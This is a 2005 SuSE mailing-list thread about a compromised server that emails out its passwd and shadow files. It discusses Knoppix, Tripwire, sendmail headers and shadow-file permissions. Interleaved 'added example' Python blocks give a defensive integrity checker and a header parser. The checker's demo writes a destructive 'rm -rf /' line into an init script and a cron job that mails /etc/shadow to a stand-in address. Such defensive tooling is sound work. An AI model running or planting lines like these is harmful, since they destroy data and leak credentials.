On Sun, Mar 13, 2005 at 09:06:26PM -0600, Henry Tang wrote:
Only if you don't boot the machine again.
If rm -rf has been put into the init sequence (perhaps /etc/boot), then by starting the machine again the rogue code will be started and do its damage.
You can boot with knoppix and then mount your partitions and examine them for damage.
Did you install tripwire?
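The "boot from Knoppix, mount the partitions and examine them" advice comes down to comparing the suspect filesystem against a known-good record of it, which is what Tripwire automates. Added example, not Tripwire and not code from anyone in this thread: a minimal baseline-and-verify check in Python. It assumes the suspect root is mounted read-only from a rescue boot (a path such as /mnt/root is an assumption) and that the baseline was taken earlier and kept off the box; demo() runs the whole thing on a constructed tree in a temporary directory, simulating the tampering this thread worries about.

```python
"""Minimal baseline-and-verify file integrity check in the spirit of Tripwire
(added example: not Tripwire, not code from anyone in this thread).
Assumed use: boot a rescue CD, mount the suspect root read-only somewhere
like /mnt/root, then compare it to a baseline taken earlier from the same
box or from a clean install of the same packages.  Nothing below touches
the running system; demo() works on a constructed tree in a temp dir."""
import hashlib
import json
import os
import stat
import tempfile


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """{relative path: attrs} for every regular file and symlink under root.
    Symlinks are recorded by target and not followed, so a link that points a
    trusted path at a rogue file shows up as a change in its own right."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            entry = {"mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid,
                     "gid": st.st_gid, "size": st.st_size}
            if stat.S_ISLNK(st.st_mode):
                entry["link"] = os.readlink(full)
            elif stat.S_ISREG(st.st_mode):
                entry["sha256"] = _sha256(full)
            else:                       # sockets, fifos, devices: skip
                continue
            baseline[os.path.relpath(full, root)] = entry
    return baseline


def save_baseline(baseline, path):
    # Keep the baseline off the box being checked (removable media, another
    # host): an intruder with root can rewrite anything stored locally.
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def verify(root, baseline):
    """Report {'added': [...], 'removed': [...], 'changed': [(path, attrs)]}.
    mtime is deliberately not compared: it is trivially reset with touch,
    while size, mode, ownership and content hash are what matter."""
    current = build_baseline(root)
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = []
    for rel in sorted(set(current) & set(baseline)):
        keys = set(current[rel]) | set(baseline[rel])
        diffs = [k for k in sorted(keys)
                 if current[rel].get(k) != baseline[rel].get(k)]
        if diffs:
            changed.append((rel, diffs))
    return {"added": added, "removed": removed, "changed": changed}


def demo():
    """Constructed tree: take a baseline, then simulate the intrusion the
    thread worries about (a command appended to an init script, a dropped
    cron job, a deleted file) and verify against the saved baseline."""
    root = tempfile.mkdtemp(prefix="integrity-demo-")
    for d in ("etc/init.d", "etc/cron.d"):
        os.makedirs(os.path.join(root, d))
    with open(os.path.join(root, "etc/init.d/boot.local"), "w") as f:
        f.write("#!/bin/sh\n# local boot commands\n")
    with open(os.path.join(root, "etc/passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    # baseline stored outside the tree being checked (stand-in for off-box)
    db = os.path.join(tempfile.mkdtemp(prefix="baseline-"), "baseline.json")
    save_baseline(build_baseline(root), db)
    # constructed tampering
    with open(os.path.join(root, "etc/init.d/boot.local"), "a") as f:
        f.write("rm -rf / &\n")
    with open(os.path.join(root, "etc/cron.d/sendshadow"), "w") as f:
        f.write("0 3 * * * root mail x@example.invalid </etc/shadow\n")
    os.remove(os.path.join(root, "etc/passwd"))
    return verify(root, load_baseline(db))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

On a real box the interesting hits are changes in files a package upgrade would not have touched (init scripts, cron entries, setuid binaries, /etc/passwd and /etc/shadow), and a baseline that only exists on the compromised disk proves nothing, since whoever got root could have regenerated it.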
Tripwire looks like pretty good software! So I still do that after booting with Knoppix?
I looked into my system and this is what I found and am wondering about.
Does this show that the email was sent by root?
H??Received: (from root@localhost) by main.yucreation.com (8.11.6/8.11.6/SuSE Linux 0.5) id j2A9fEW12735 for Blondu@mamef.us; Thu, 10 Mar 2005 03:41:14 -0600
H?D?Date: Thu, 10 Mar 2005 03:41:14 -0600
H?F?From: root <root>
I think the hack that sends out the email with the shadow and passwd listing either has root access or shadow group access, because according to the listing below only a user in group shadow or root can read the file. If the hacker has root, what is the purpose of getting the system config or shadow file via email? I don't see a reason to go through all that trouble. So it must be user gdm.
GDM is an application like KDM which shows a GUI log in...
shadow:x:15:root,gdm
-rw-r--r--   1 root root     3102 Mar 11 03:49 passwd
-rw-r--r--   1 root root     3102 Jan  5 23:26 passwd-
-rw-r--r--   1 root root     2761 Oct  8  2003 passwd.bak
-rw-r--r--   1 root root     2942 Nov 23  2003 passwd.old
main:/etc # ls -la | grep shadow
-rw-r--r--   1 root shadow    772 Feb  9 15:35 group
-rw-r--r--   1 root shadow    744 Oct  7  2003 group.bak
-rw-r-----   1 root shadow    765 Nov  7  2003 gshadow
-rw-------   1 root root      755 Nov  7  2003 gshadow-
-rw-r-----   1 root shadow   1859 Mar 11 04:26 shadow
-rw-r-----   1 root shadow   1819 Jan 12 12:07 shadow-
-rw-r-----   1 root shadow   1361 Oct  8  2003 shadow.bak
-rw-r-----   1 root shadow   1859 Mar 11 04:24 shadow.old
In the file listing below, it is open to anyone, so that doesn't explain much. :9
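The header lines quoted above are in sendmail's queue control (qf) file format, where each header is stored as H?flags?Name: value, and the "(from root@localhost)" clause in sendmail's own Received: header is filled in from the uid of the process that handed the mail to sendmail, which is what makes it more telling than the From: header the sender chooses. Added example, not code from anyone in this thread: a parser for those H lines plus a discretionary-access check that answers "who can read a -rw-r----- root:shadow file given shadow:x:15:root,gdm", which is the reasoning applied to /etc/shadow above. The header lines are the post's own; the V/T/S/R filler records, the extra account names and the root:x:0: group line are constructed.

```python
"""Two checks for the questions in the post above (added example, not code
from the thread): which Unix account handed a queued mail to sendmail, and
who can read a file such as /etc/shadow given its mode, group and the
/etc/group entry.  Sample data is the post's own header lines plus
constructed filler marked as such."""
import re

# Sendmail queue control (qf) files store each header as H?flags?Name: value;
# the flags between the question marks may be empty, as in H??Received:.
QF_HEADER = re.compile(r"^H(?:\?[^?]*\?)?([A-Za-z0-9-]+):\s*(.*)$")
# In sendmail's own Received: header the "(from user@host)" clause comes from
# the uid of the submitting process, not from the user-supplied From: header.
LOCAL_FROM = re.compile(r"\(from\s+([^@\s)]+)@([^)\s]+)\)")

# Header lines as quoted in the post; the V/T/S/R records are constructed
# filler in the general shape of a qf file and are ignored by the parser.
SAMPLE_QF = [
    "V6",
    "T1110447674",
    "S<root>",
    "R<Blondu@mamef.us>",
    "H??Received: (from root@localhost) by main.yucreation.com "
    "(8.11.6/8.11.6/SuSE Linux 0.5) id j2A9fEW12735",
    "\tfor Blondu@mamef.us; Thu, 10 Mar 2005 03:41:14 -0600",
    "H?D?Date: Thu, 10 Mar 2005 03:41:14 -0600",
    "H?F?From: root <root>",
    ".",
]
SHADOW_GROUP_LINE = "shadow:x:15:root,gdm"   # from the post's /etc/group


def parse_qf_headers(lines):
    """[(name, value)] for the H records; tab/space-led lines continue the
    previous header, other record types are skipped."""
    headers = []
    for line in lines:
        m = QF_HEADER.match(line)
        if m:
            headers.append((m.group(1), m.group(2)))
        elif headers and line[:1] in (" ", "\t"):
            name, val = headers[-1]
            headers[-1] = (name, val + " " + line.strip())
    return headers


def local_submitter(headers):
    """(user, host) from the first Received: with a (from user@host) clause,
    or None if the mail did not come in through a local submission."""
    for name, val in headers:
        if name.lower() == "received":
            m = LOCAL_FROM.search(val)
            if m:
                return m.group(1), m.group(2)
    return None


def can_read(mode, owner, group, group_line, user, primary_group=None):
    """Discretionary access check as the kernel does it: root always; owner
    bits if user owns the file; group bits if user is in the file's group
    (by /etc/group member list or primary group); otherwise 'other' bits.
    Only the first matching class counts, there is no fall-through."""
    if user == "root":
        return True
    perms = mode[1:10]                      # drop the type character
    if user == owner:
        return perms[0] == "r"
    fields = group_line.strip().split(":")
    members = set(fields[3].split(",")) if len(fields) > 3 and fields[3] else set()
    if fields[0] == group and (user in members or primary_group == group):
        return perms[3] == "r"
    return perms[6] == "r"


def who_submitted_sample():
    """Runs the qf parser over SAMPLE_QF; returns ('root', 'localhost')."""
    return local_submitter(parse_qf_headers(SAMPLE_QF))


def shadow_readers(users=("root", "gdm", "henry", "choad")):
    """Which of the given accounts can read a -rw-r----- root:shadow file
    (henry and choad are constructed names for the non-member case)."""
    return {u: can_read("-rw-r-----", "root", "shadow", SHADOW_GROUP_LINE, u)
            for u in users}


if __name__ == "__main__":
    print(who_submitted_sample())
    print(shadow_readers())
```

The reading of the sample is therefore: the message was submitted by a process running as uid 0, and by the group line both root and gdm could read /etc/shadow; the Received clause does not by itself say which of the two did it, only that whatever ran had root at the moment it called sendmail.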
===============================================================
Mainly replying to point something out here: Nethack is a game. They aren't "hacking files".
Hacking Files..
/etc/opt/gnome/SuSE/Games/TacticStrategy/xnethack.desktop
/etc/opt/kde2/share/applnk/SuSE/Games/TacticStrategy/xnethack.desktop
/etc/X11/susewm/AddEntrys/SuSE/Games/Action/nethack.desktop
/etc/X11/susewm/AddEntrys/SuSE/Games/TacticStrategy/nethack.desktop
/etc/X11/susewm/AddEntrys/SuSE/Games/TacticStrategy/xnethack.desktop
/etc/X11/susewm/AddEntrys/SuSE/Games/unspec/gnomehack.-368.desktop
/etc/X11/susewm/AddEntrys/SuSE/Games/unspec/gnomehack.desktop
/home/choad/ftp/appz/Macromedia_Studio_MX/FreeHand/Goodies/Assets/Templates/WebSite Templates/Snake Shack.FT9
/home/henry/hacking
/home/henry/_desktop/replays/hacked.rep
/home/henry/_desktop/replays/hacked2.rep
/opt/gnome/share/gnome/distribution-menus/SuSE/Games/TacticStrategy/xnethack.desktop
/opt/gnome/share/sawfish/1.0/lisp/sawfish/wm/ext/3d-hack.jl
/opt/gnome/share/sawfish/1.0/lisp/sawfish/wm/ext/3d-hack.jlc
/usr/games/nethack
/usr/games/nethack.d
/usr/games/nethack.d/nethack.qt
--
Check the headers for your unsubscription address
For additional commands send e-mail to suse-linux-e-help@suse.com
Also check the archives at http://lists.suse.com
Please read the FAQs: suse-linux-e-faq@suse.com